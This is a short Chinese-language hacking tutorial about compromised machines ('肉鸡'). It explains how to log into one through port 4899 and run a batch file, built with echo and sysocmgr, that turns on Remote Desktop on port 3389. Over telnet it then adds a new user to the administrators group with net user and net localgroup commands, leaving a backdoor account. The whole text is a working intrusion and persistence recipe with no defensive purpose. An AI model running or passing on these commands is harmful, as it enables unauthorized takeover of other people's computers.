1:找台有4899的机器,可以进行4899登陆(前提) 2:把下列文字生成*.BAT传到肉鸡的C:下 echo [Components] > c:sql

echo TSEnable = on >> c:sql

sysocmgr /i:c:winntinfsysoc.inf /u:c:sql /q

再用黑社会软件对其进行TELNET登陆并执行此文件,执行有个过程,一般3~5分钟不等 之后你可以扫描,发现他的3389端口开了!OK! 3:帐号建立 在肉鸡的TELNET下输入 net user 你想建立的用户名字 你想建立的用户密码 /add net localgroup administrators 你建立的用户名字 /add 如果执行成功,则之后会命令下会有一排字"命令执行成功",等这条出现后再执行下一条即可 4:OK!成功!登陆吧!